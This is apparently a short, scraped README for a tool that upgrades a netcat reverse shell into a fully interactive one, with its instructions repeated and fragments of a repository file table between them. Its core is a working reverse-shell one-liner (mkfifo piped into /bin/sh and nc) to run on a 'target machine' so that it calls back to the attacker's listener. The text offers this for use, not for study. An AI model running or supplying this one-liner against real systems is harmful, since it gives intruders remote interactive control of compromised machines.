run ./netcatup.sh port
run rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc targetip port >/tmp/f on the target machine
You should now have a fully interactive shell with bash history and tab completion
- add bind support
| Name | Name | Last commit date | ||
|---|---|---|---|---|
run ./netcatup.sh port
run rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc targetip port >/tmp/f on the target machine
You should now have a fully interactive shell with bash history and tab completion